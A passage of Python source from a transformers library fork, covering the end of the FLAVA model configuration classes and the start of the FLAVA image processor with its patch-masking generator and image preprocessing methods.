Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"selu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention probabilities.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
qkv_bias (`bool`, *optional*, defaults to `True`):
Whether to add a bias to the queries, keys and values.
use_cls_token (`bool`, *optional*, defaults to `True`):
Whether to use an extra CLS token for multimodal settings. Usually needed by the FLAVA model.
Example:
```python
>>> from transformers import FlavaMultimodalConfig, FlavaMultimodalModel
>>> # Initializing a FlavaMultimodalModel with style configuration
>>> configuration = FlavaMultimodalConfig()
>>> # Initializing a FlavaMultimodalModel model (with random weights) from the style configuration
>>> model = FlavaMultimodalModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "flava_multimodal_model"
def __init__(
self,
hidden_size: int = 768,
num_hidden_layers: int = 6,
num_attention_heads: int = 12,
intermediate_size: int = 3072,
hidden_act: int = "gelu",
hidden_dropout_prob: int = 0.0,
attention_probs_dropout_prob: int = 0.0,
initializer_range: float = 0.02,
layer_norm_eps: float = 1e-12,
qkv_bias: bool = True,
use_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.qkv_bias = qkv_bias
self.use_cls_token = use_cls_token
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)
# get the multimodal config dict if we are loading from FlavaConfig
if config_dict.get("model_type") == "flava":
config_dict = config_dict["multimodal_config"]
if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
logger.warning(
f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
)
return cls.from_dict(config_dict, **kwargs)
class FlavaImageCodebookConfig(PretrainedConfig):
model_type = "flava_image_codebook"
r"""
[`FlavaImageCodebookConfig`] is the configuration class to store the configuration of a [`FlavaImageCodebook`]. It
is used to instantiate an FLAVA model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
[facebook/flava-image-codebook](https://huggingface.co/facebook/flava-image-codebook) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
num_groups (`int`, defaults to 4):
Number of groups to be created. This parameter as of now doesn't affect the model and is used for some
internal calculation and estimations.
input_channels (`int`, defaults to 3):
Number of channels in the image to be passed.
num_blocks_per_group (`int`, defaults to 2):
Number of conv-based blocks per group.
hidden_size (`int`, defaults to 256):
Size of hidden dim for the blocks.
vocab_size (`int`, defaults to 8192):
Size of the output vocabulary for the codebook.
freeze (`bool`, defaults to `True`):
Whether to freeze the weights of the model.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
kwargs (*optional*):
Dictionary of keyword arguments.
Example:
```python
>>> from transformers import FlavaImageCodebookConfig, FlavaImageCodebook
>>> # Initializing a FlavaImageCodebook with style configuration
>>> configuration = FlavaImageCodebookConfig()
>>> # Initializing a FlavaImageCodebook model (with random weights) from the style configuration
>>> model = FlavaImageCodebook(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```
"""
def __init__(
self,
num_groups: int = 4,
input_channels: int = 3,
num_blocks_per_group: int = 2,
hidden_size: int = 256,
vocab_size: int = 8192,
freeze: int = True,
initializer_range: float = 0.02,
**kwargs,
):
super().__init__(**kwargs)
self.num_groups = num_groups
self.input_channels = input_channels
self.num_blocks_per_group = num_blocks_per_group
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.freeze = freeze
self.initializer_range = initializer_range
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)
# get the image codebook config dict if we are loading from FlavaConfig
if config_dict.get("model_type") == "flava":
config_dict = config_dict["image_codebook_config"]
if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
logger.warning(
f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
)
return cls.from_dict(config_dict, **kwargs)
class FlavaConfig(PretrainedConfig):
r"""
[`FlavaConfig`] is the configuration class to store the configuration of a [`FlavaModel`]. It is used to
instantiate FLAVA model according to the specified arguments, defining the text model, image model, image codebook
and multimodal model configs. Instantiating a configuration with the defaults will yield a similar configuration to
that of the FLAVA [facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
text_config (`dict`, *optional*):
Dictionary of configuration options used to initialize [`FlavaTextConfig`].
image_config (`dict`, *optional*):
Dictionary of configuration options used to initialize [`FlavaImageConfig`].
multimodal_config (`dict`, *optional*):
Dictionary of configuration options used to initialize [`FlavaMultimodalConfig`].
hidden_size (`int`, *optional*, defaults to 768):
Dimensionality of the encoder layers and the pooler layer.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
projection_dim (`int`, *optional*, defaults to 512):
Dimentionality of text and image projection layers.
logit_scale_init_value (`float`, *optional*, defaults to 2.6592):
The inital value of the *logit_scale* paramter. Default is used as per the original FLAVA/CLIP
implementation.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
ce_ignore_index (`int`, *optional*, defaults to -100):
Cross entropy index to ignore.
mim_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to MIM (Masked Image Modeling) unimodal loss
mlm_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to MLM (Masked Language Modeling) unimodal loss
global_contrastive_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to global contrastive cross-alignment loss.
itm_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to image-text matching multimodal loss.
mmm_image_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to MMM loss's image part.
mmm_text_weight (`float`, *optional*, defaults to 1.0):
Weight to be assigned to MMM loss's text part.
global_backprop_contrastive (`bool`, *optional*, defaults to `True`):
Whether to use global backpropgation through all workers in contrastive loss.
skip_unmasked_multimodal_encoder (`bool`, *optional*, defaults to `True`):
Whether to skip running unmasked multimodal encoder whose outputs are not used by FLAVA losses.
return_loss (`bool`, *optional*, defaults to `True`):
Whether to return loss or not
kwargs (*optional*):
Dictionary of keyword arguments.
Example:
```python
>>> from transformers import FlavaConfig, FlavaModel, FlavaForPreTraining
>>> # Initializing a FlavaConfig with style configuration
>>> configuration = FlavaConfig()
>>> # Initializing a FlavaModel and FlavaForPreTraining model (with random weights) from the style configuration
>>> model = FlavaModel(configuration)
>>> model_pre = FlavaForPreTraining(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
>>> configuration_pre = model_pre.config
```
"""
model_type = "flava"
is_composition = True
def __init__(
self,
image_config: Dict[str, Any] = None,
text_config: Dict[str, Any] = None,
multimodal_config: Dict[str, Any] = None,
image_codebook_config: Dict[str, Any] = None,
hidden_size: int = 768,
layer_norm_eps: float = 1e-12,
projection_dim: int = 768,
init_codebook: bool = True,
logit_scale_init_value: float = 2.6592,
initializer_range: float = 0.02,
ce_ignore_index: int = -100,
mim_weight: float = 1.0,
mlm_weight: float = 1.0,
global_contrastive_weight: float = 1.0,
itm_weight: float = 1.0,
mmm_image_weight: float = 1.0,
mmm_text_weight: float = 1.0,
global_backprop_contrastive: bool = True,
skip_unmasked_multimodal_encoder: bool = True,
return_loss: bool = True,
**kwargs,
):
super().__init__(**kwargs)
# If `_config_dict` exist, we use them for the backward compatibility.
text_config_dict = kwargs.pop("text_config_dict", None)
image_config_dict = kwargs.pop("vision_config_dict", None)
multimodal_config_dict = kwargs.pop("multimodal_config_dict", None)
image_codebook_config_dict = kwargs.pop("image_codebook_config_dict", None)
if text_config_dict is not None:
text_config = text_config_dict
if image_config_dict is not None:
image_config = image_config_dict
if multimodal_config_dict is not None:
multimodal_config = multimodal_config_dict
if image_codebook_config_dict is not None:
image_codebook_config = image_codebook_config_dict
if image_config is None:
image_config = {}
logger.info("image_config is None. initializing the FlavaImageConfig with default values.")
if text_config is None:
text_config = {}
logger.info("text_config is None. Initializing the FlavaTextConfig with default values.")
if multimodal_config is None:
multimodal_config = {}
logger.info("multimodal_config is None. initializing the FlavaMultimodalConfig with default values.")
if image_codebook_config is None:
image_codebook_config = {}
logger.info(
"image_codebook_config is None. initializing the FlavaImageCodebookConfig with default values."
)
self.image_config = FlavaImageConfig(**image_config)
self.text_config = FlavaTextConfig(**text_config)
self.multimodal_config = FlavaMultimodalConfig(**multimodal_config)
self.image_codebook_config = FlavaImageCodebookConfig(**image_codebook_config)
self.projection_dim = projection_dim
self.init_codebook = init_codebook
self.hidden_size = hidden_size
self.layer_norm_eps = layer_norm_eps
self.initializer_range = initializer_range
self.logit_scale_init_value = logit_scale_init_value
self.initializer_factor = 1.0
self.ce_ignore_index = ce_ignore_index
self.mim_weight = mim_weight
self.mlm_weight = mlm_weight
self.global_contrastive_weight = global_contrastive_weight
self.itm_weight = itm_weight
self.mmm_image_weight = mmm_image_weight
self.mmm_text_weight = mmm_text_weight
self.global_backprop_contrastive = global_backprop_contrastive
self.skip_unmasked_multimodal_encoder = skip_unmasked_multimodal_encoder
self.return_loss = return_loss
@classmethod
def from_configs(
cls,
image_config: FlavaImageConfig,
text_config: FlavaTextConfig,
multimodal_config: FlavaMultimodalConfig,
image_codebook_config: FlavaImageCodebookConfig,
**kwargs,
):
r"""
Instantiate a [`FlavaConfig`] (or a derived class) from flava text model configuration, flava image model
configuration, flava multimodal model and flava codebook model configuration.
Returns:
[`FlavaConfig`]: An instance of a configuration object
"""
return cls(
image_config=image_config.to_dict(),
text_config=text_config.to_dict(),
multimodal_config=multimodal_config.to_dict(),
image_codebook_config=image_codebook_config.to_dict(),
**kwargs,
)
def to_dict(self):
"""
Serializes this instance to a Python dictionary. Override the default [`~PretrainedConfig.to_dict`].
Returns:
`Dict[str, any]`: Dictionary of all the attributes that make up this configuration instance,
"""
output = copy.deepcopy(self.__dict__)
output["image_config"] = self.image_config.to_dict()
output["text_config"] = self.text_config.to_dict()
output["multimodal_config"] = self.multimodal_config.to_dict()
output["image_codebook_config"] = self.image_codebook_config.to_dict()
output["model_type"] = self.__class__.model_type
return output
|
27182812/ChatGLM-LLaMA-chinese-insturct | 36,878 | src/transformers/models/flava/image_processing_flava.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Flava."""
import math
import random
from functools import lru_cache
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import center_crop, normalize, rescale, resize, to_channel_dimension_format
from ...image_utils import (
OPENAI_CLIP_MEAN,
OPENAI_CLIP_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, is_vision_available, logging
if is_vision_available():
import PIL
logger = logging.get_logger(__name__)
# These values are taken from CLIP
FLAVA_IMAGE_MEAN = OPENAI_CLIP_MEAN
FLAVA_IMAGE_STD = OPENAI_CLIP_STD
FLAVA_CODEBOOK_MEAN = [0.0, 0.0, 0.0]
FLAVA_CODEBOOK_STD = [1.0, 1.0, 1.0]
LOGIT_LAPLACE_EPS: float = 0.1
# Inspired from https://github.com/microsoft/unilm/blob/master/beit/masking_generator.py
class FlavaMaskingGenerator:
def __init__(
self,
input_size: Union[int, Tuple[int, int]] = 14,
total_mask_patches: int = 75,
mask_group_max_patches: Optional[int] = None,
mask_group_min_patches: int = 16,
mask_group_min_aspect_ratio: Optional[float] = 0.3,
mask_group_max_aspect_ratio: float = None,
):
if not isinstance(input_size, tuple):
input_size = (input_size,) * 2
self.height, self.width = input_size
self.num_patches = self.height * self.width
self.total_mask_patches = total_mask_patches
self.mask_group_min_patches = mask_group_min_patches
self.mask_group_max_patches = total_mask_patches if mask_group_max_patches is None else mask_group_max_patches
mask_group_max_aspect_ratio = mask_group_max_aspect_ratio or 1 / mask_group_min_aspect_ratio
self.log_aspect_ratio = (math.log(mask_group_min_aspect_ratio), math.log(mask_group_max_aspect_ratio))
def __repr__(self):
repr_str = "MaskingGenerator(%d, %d -> [%d ~ %d], max = %d, %.3f ~ %.3f)" % (
self.height,
self.width,
self.mask_group_min_patches,
self.mask_group_max_patches,
self.total_mask_patches,
self.log_aspect_ratio[0],
self.log_aspect_ratio[1],
)
return repr_str
def get_shape(self):
return self.height, self.width
def _mask(self, mask, max_mask_patches):
delta = 0
for _attempt in range(10):
target_area = random.uniform(self.mask_group_min_patches, max_mask_patches)
aspect_ratio = math.exp(random.uniform(*self.log_aspect_ratio))
height = int(round(math.sqrt(target_area * aspect_ratio)))
width = int(round(math.sqrt(target_area / aspect_ratio)))
if width < self.width and height < self.height:
top = random.randint(0, self.height - height)
left = random.randint(0, self.width - width)
num_masked = mask[top : top + height, left : left + width].sum()
# Overlap
if 0 < height * width - num_masked <= max_mask_patches:
for i in range(top, top + height):
for j in range(left, left + width):
if mask[i, j] == 0:
mask[i, j] = 1
delta += 1
if delta > 0:
break
return delta
def __call__(self):
mask = np.zeros(shape=self.get_shape(), dtype=int)
mask_count = 0
while mask_count < self.total_mask_patches:
max_mask_patches = self.total_mask_patches - mask_count
max_mask_patches = min(max_mask_patches, self.mask_group_max_patches)
delta = self._mask(mask, max_mask_patches)
if delta == 0:
break
else:
mask_count += delta
return mask
class FlavaImageProcessor(BaseImageProcessor):
r"""
Constructs a Flava image processor.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize the image's (height, width) dimensions to the specified `size`. Can be overridden by the
`do_resize` parameter in `preprocess`.
size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
Size of the image after resizing. Can be overridden by the `size` parameter in `preprocess`.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
Resampling filter to use if resizing the image. Can be overridden by the `resample` parameter in
`preprocess`.
do_center_crop (`bool`, *optional*, defaults to `True`):
Whether to center crop the images. Can be overridden by the `do_center_crop` parameter in `preprocess`.
crop_size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
Size of image after the center crop `(crop_size["height"], crop_size["width"])`. Can be overridden by the
`crop_size` parameter in `preprocess`.
do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by the `do_rescale`
parameter in `preprocess`.
rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Scale factor to use if rescaling the image. Can be overridden by the `rescale_factor` parameter in
`preprocess`.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether to normalize the image. Can be overridden by the `do_normalize` parameter in `preprocess`.
image_mean (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_MEAN`):
Mean to use if normalizing the image. This is a float or list of floats the length of the number of
channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
image_std (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_STD`):
Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
return_image_mask (`bool`, *optional*, defaults to `False`):
Whether to return the image mask. Can be overridden by the `return_image_mask` parameter in `preprocess`.
input_size_patches (`int`, *optional*, defaults to 14):
Number of patches in the image in height and width direction. 14x14 = 196 total patches. Can be overridden
by the `input_size_patches` parameter in `preprocess`.
total_mask_patches (`int`, *optional*, defaults to 75):
Total number of patches that should be masked. Can be overridden by the `total_mask_patches` parameter in
`preprocess`.
mask_group_min_patches (`int`, *optional*, defaults to 16):
Minimum number of patches that should be masked. Can be overridden by the `mask_group_min_patches`
parameter in `preprocess`.
mask_group_max_patches (`int`, *optional*):
Maximum number of patches that should be masked. Can be overridden by the `mask_group_max_patches`
parameter in `preprocess`.
mask_group_min_aspect_ratio (`float`, *optional*, defaults to 0.3):
Minimum aspect ratio of the mask window. Can be overridden by the `mask_group_min_aspect_ratio` parameter
in `preprocess`.
mask_group_max_aspect_ratio (`float`, *optional*):
Maximum aspect ratio of the mask window. Can be overridden by the `mask_group_max_aspect_ratio` parameter
in `preprocess`.
codebook_do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize the input for codebook to a certain. Can be overridden by the `codebook_do_resize`
parameter in `preprocess`. `codebook_size`.
codebook_size (`Dict[str, int]`, *optional*, defaults to `{"height": 224, "width": 224}`):
Resize the input for codebook to the given size. Can be overridden by the `codebook_size` parameter in
`preprocess`.
codebook_resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.LANCZOS`):
Resampling filter to use if resizing the codebook image. Can be overridden by the `codebook_resample`
parameter in `preprocess`.
codebook_do_center_crop (`bool`, *optional*, defaults to `True`):
Whether to crop the input for codebook at the center. If the input size is smaller than
`codebook_crop_size` along any edge, the image is padded with 0's and then center cropped. Can be
overridden by the `codebook_do_center_crop` parameter in `preprocess`.
codebook_crop_size (`Dict[str, int]`, *optional*, defaults to `{"height": 224, "width": 224}`):
Desired output size for codebook input when applying center-cropping. Can be overridden by the
`codebook_crop_size` parameter in `preprocess`.
codebook_do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the input for codebook by the specified scale `codebook_rescale_factor`. Can be
overridden by the `codebook_do_rescale` parameter in `preprocess`.
codebook_rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Defines the scale factor to use if rescaling the codebook image. Can be overridden by the
`codebook_rescale_factor` parameter in `preprocess`.
codebook_do_map_pixels (`bool`, *optional*, defaults to `True`):
Whether to map the pixel values of the codebook input to (1 - 2e)x + e. Can be overridden by the
`codebook_do_map_pixels` parameter in `preprocess`.
codebook_do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input for codebook with `codebook_image_mean` and `codebook_image_std`. Can
be overridden by the `codebook_do_normalize` parameter in `preprocess`.
codebook_image_mean (`Optional[Union[float, Iterable[float]]]`, *optional*, defaults to `[0, 0, 0]`):
The sequence of means for each channel, to be used when normalizing images for codebook. Can be overridden
by the `codebook_image_mean` parameter in `preprocess`.
codebook_image_std (`Optional[Union[float, Iterable[float]]]`, *optional*, defaults to `[0.5, 0.5, 0.5]`):
The sequence of standard deviations for each channel, to be used when normalizing images for codebook. Can
be overridden by the `codebook_image_std` parameter in `preprocess`.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize: bool = True,
size: Dict[str, int] = None,
resample: PILImageResampling = PILImageResampling.BICUBIC,
do_center_crop: bool = True,
crop_size: Dict[str, int] = None,
do_rescale: bool = True,
rescale_factor: Union[int, float] = 1 / 255,
do_normalize: bool = True,
image_mean: Optional[Union[float, Iterable[float]]] = None,
image_std: Optional[Union[float, Iterable[float]]] = None,
# Mask related params
return_image_mask: bool = False,
input_size_patches: int = 14,
total_mask_patches: int = 75,
mask_group_min_patches: int = 16,
mask_group_max_patches: Optional[int] = None,
mask_group_min_aspect_ratio: float = 0.3,
mask_group_max_aspect_ratio: Optional[float] = None,
# Codebook related params
return_codebook_pixels: bool = False,
codebook_do_resize: bool = True,
codebook_size: bool = None,
codebook_resample: int = PILImageResampling.LANCZOS,
codebook_do_center_crop: bool = True,
codebook_crop_size: int = None,
codebook_do_rescale: bool = True,
codebook_rescale_factor: Union[int, float] = 1 / 255,
codebook_do_map_pixels: bool = True,
codebook_do_normalize: bool = True,
codebook_image_mean: Optional[Union[float, Iterable[float]]] = None,
codebook_image_std: Optional[Union[float, Iterable[float]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
size = size if size is not None else {"height": 224, "width": 224}
size = get_size_dict(size)
crop_size = crop_size if crop_size is not None else {"height": 224, "width": 224}
crop_size = get_size_dict(crop_size, param_name="crop_size")
codebook_size = codebook_size if codebook_size is not None else {"height": 112, "width": 112}
codebook_size = get_size_dict(codebook_size, param_name="codebook_size")
codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else {"height": 112, "width": 112}
codebook_crop_size = get_size_dict(codebook_crop_size, param_name="codebook_crop_size")
self.do_resize = do_resize
self.size = size
self.resample = resample
self.do_rescale = do_rescale
self.rescale_factor = rescale_factor
self.do_center_crop = do_center_crop
self.crop_size = crop_size
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else FLAVA_IMAGE_MEAN
self.image_std = image_std if image_std is not None else FLAVA_IMAGE_STD
self.return_image_mask = return_image_mask
self.input_size_patches = input_size_patches
self.total_mask_patches = total_mask_patches
self.mask_group_min_patches = mask_group_min_patches
self.mask_group_max_patches = mask_group_max_patches
self.mask_group_min_aspect_ratio = mask_group_min_aspect_ratio
self.mask_group_max_aspect_ratio = mask_group_max_aspect_ratio
self.return_codebook_pixels = return_codebook_pixels
self.codebook_do_resize = codebook_do_resize
self.codebook_size = codebook_size
self.codebook_resample = codebook_resample
self.codebook_do_center_crop = codebook_do_center_crop
self.codebook_crop_size = codebook_crop_size
self.codebook_do_rescale = codebook_do_rescale
self.codebook_rescale_factor = codebook_rescale_factor
self.codebook_do_map_pixels = codebook_do_map_pixels
self.codebook_do_normalize = codebook_do_normalize
self.codebook_image_mean = codebook_image_mean
self.codebook_image_mean = codebook_image_mean if codebook_image_mean is not None else FLAVA_CODEBOOK_MEAN
self.codebook_image_std = codebook_image_std if codebook_image_std is not None else FLAVA_CODEBOOK_STD
@classmethod
def from_dict(cls, image_processor_dict: Dict[str, Any], **kwargs):
"""
Overrides the `from_dict` method from the base class to make sure parameters are updated if image processor is
created using from_dict and kwargs e.g. `FlavaImageProcessor.from_pretrained(checkpoint, codebook_size=600)`
"""
image_processor_dict = image_processor_dict.copy()
if "codebook_size" in kwargs:
image_processor_dict["codebook_size"] = kwargs.pop("codebook_size")
if "codebook_crop_size" in kwargs:
image_processor_dict["codebook_crop_size"] = kwargs.pop("codebook_crop_size")
return super().from_dict(image_processor_dict, **kwargs)
@lru_cache()
def masking_generator(
self,
input_size_patches,
total_mask_patches,
mask_group_min_patches,
mask_group_max_patches,
mask_group_min_aspect_ratio,
mask_group_max_aspect_ratio,
) -> FlavaMaskingGenerator:
return FlavaMaskingGenerator(
input_size=input_size_patches,
total_mask_patches=total_mask_patches,
mask_group_min_patches=mask_group_min_patches,
mask_group_max_patches=mask_group_max_patches,
mask_group_min_aspect_ratio=mask_group_min_aspect_ratio,
mask_group_max_aspect_ratio=mask_group_max_aspect_ratio,
)
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BICUBIC,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize an image to `(size["height"], size["width"])`.
Args:
image (`np.ndarray`):
Image to resize.
size (`Dict[str, int]`):
Size of the output image.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
Resampling filter to use when resiizing the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
size = get_size_dict(size)
if "height" not in size or "width" not in size:
raise ValueError(f"The size dictionary must contain 'height' and 'width' keys. Got {size.keys()}")
return resize(
image, size=(size["height"], size["width"]), resample=resample, data_format=data_format, **kwargs
)
def center_crop(
self,
image: np.ndarray,
size: Dict[str, int],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Center crop an image to `(size["height"], size["width"])`. If the input size is smaller than `crop_size` along
any edge, the image is padded with 0's and then center cropped.
Args:
image (`np.ndarray`):
Image to center crop.
size (`Dict[str, int]`):
Size of the output image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
size = get_size_dict(size)
if "height" not in size or "width" not in size:
raise ValueError(f"The size dictionary must contain 'height' and 'width' keys. Got {size.keys()}")
return center_crop(image, size=(size["height"], size["width"]), data_format=data_format, **kwargs)
def rescale(
self,
image: np.ndarray,
scale: Union[int, float],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
):
"""
Rescale an image by a scale factor. image = image * scale.
Args:
image (`np.ndarray`):
Image to rescale.
scale (`int` or `float`):
Scale to apply to the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return rescale(image, scale=scale, data_format=data_format, **kwargs)
def normalize(
self,
image: np.ndarray,
mean: Union[float, List[float]],
std: Union[float, List[float]],
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Normalize an image. image = (image - image_mean) / image_std.
Args:
image (`np.ndarray`):
Image to normalize.
image_mean (`float` or `List[float]`):
Image mean.
image_std (`float` or `List[float]`):
Image standard deviation.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
def map_pixels(self, image: np.ndarray) -> np.ndarray:
return (1 - 2 * LOGIT_LAPLACE_EPS) * image + LOGIT_LAPLACE_EPS
def _preprocess_image(
self,
image: ImageInput,
do_resize: bool = None,
size: Dict[str, int] = None,
resample: PILImageResampling = None,
do_center_crop: bool = None,
crop_size: Dict[str, int] = None,
do_rescale: bool = None,
rescale_factor: float = None,
do_normalize: bool = None,
image_mean: Optional[Union[float, List[float]]] = None,
image_std: Optional[Union[float, List[float]]] = None,
do_map_pixels: bool = None,
data_format: Optional[ChannelDimension] = ChannelDimension.FIRST,
) -> np.ndarray:
"""Preprocesses a single image."""
if do_resize and size is None or resample is None:
raise ValueError("Size and resample must be specified if do_resize is True.")
if do_rescale and rescale_factor is None:
raise ValueError("Rescale factor must be specified if do_rescale is True.")
if do_normalize and (image_mean is None or image_std is None):
raise ValueError("Image mean and std must be specified if do_normalize is True.")
# All transformations expect numpy arrays.
image = to_numpy_array(image)
if do_resize:
image = self.resize(image=image, size=size, resample=resample)
if do_center_crop:
image = self.center_crop(image=image, size=crop_size)
if do_rescale:
image = self.rescale(image=image, scale=rescale_factor)
if do_normalize:
image = self.normalize(image=image, mean=image_mean, std=image_std)
if do_map_pixels:
image = self.map_pixels(image)
if data_format is not None:
image = to_channel_dimension_format(image, data_format)
return image
def preprocess(
self,
images: ImageInput,
do_resize: Optional[bool] = None,
size: Dict[str, int] = None,
resample: PILImageResampling = None,
do_center_crop: Optional[bool] = None,
crop_size: Optional[Dict[str, int]] = None,
do_rescale: Optional[bool] = None,
rescale_factor: Optional[float] = None,
do_normalize: Optional[bool] = None,
image_mean: Optional[Union[float, List[float]]] = None,
image_std: Optional[Union[float, List[float]]] = None,
# Mask related params
return_image_mask: Optional[bool] = None,
input_size_patches: Optional[int] = None,
total_mask_patches: Optional[int] = None,
mask_group_min_patches: Optional[int] = None,
mask_group_max_patches: Optional[int] = None,
mask_group_min_aspect_ratio: Optional[float] = None,
mask_group_max_aspect_ratio: Optional[float] = None,
# Codebook related params
return_codebook_pixels: Optional[bool] = None,
codebook_do_resize: Optional[bool] = None,
codebook_size: Optional[Dict[str, int]] = None,
codebook_resample: Optional[int] = None,
codebook_do_center_crop: Optional[bool] = None,
codebook_crop_size: Optional[Dict[str, int]] = None,
codebook_do_rescale: Optional[bool] = None,
codebook_rescale_factor: Optional[float] = None,
codebook_do_map_pixels: Optional[bool] = None,
codebook_do_normalize: Optional[bool] = None,
codebook_image_mean: Optional[Iterable[float]] = None,
codebook_image_std: Optional[Iterable[float]] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
data_format: ChannelDimension = ChannelDimension.FIRST,
**kwargs,
) -> PIL.Image.Image:
"""
Preprocess an image or batch of images.
Args:
images (`ImageInput`):
Image to preprocess.
do_resize (`bool`, *optional*, defaults to `self.do_resize`):
Whether to resize the image.
size (`Dict[str, int]`, *optional*, defaults to `self.size`):
Size of the image.
resample (`int`, *optional*, defaults to `self.resample`):
Resampling filter to use if resizing the image. This can be one of the enum `PILImageResampling`, Only
has an effect if `do_resize` is set to `True`.
do_center_crop (`bool`, *optional*, defaults to `self.do_center_crop`):
Whether to center crop the image.
crop_size (`Dict[str, int]`, *optional*, defaults to `self.crop_size`):
Size of the center crop. Only has an effect if `do_center_crop` is set to `True`.
do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
Whether to rescale the image values between [0 - 1].
rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
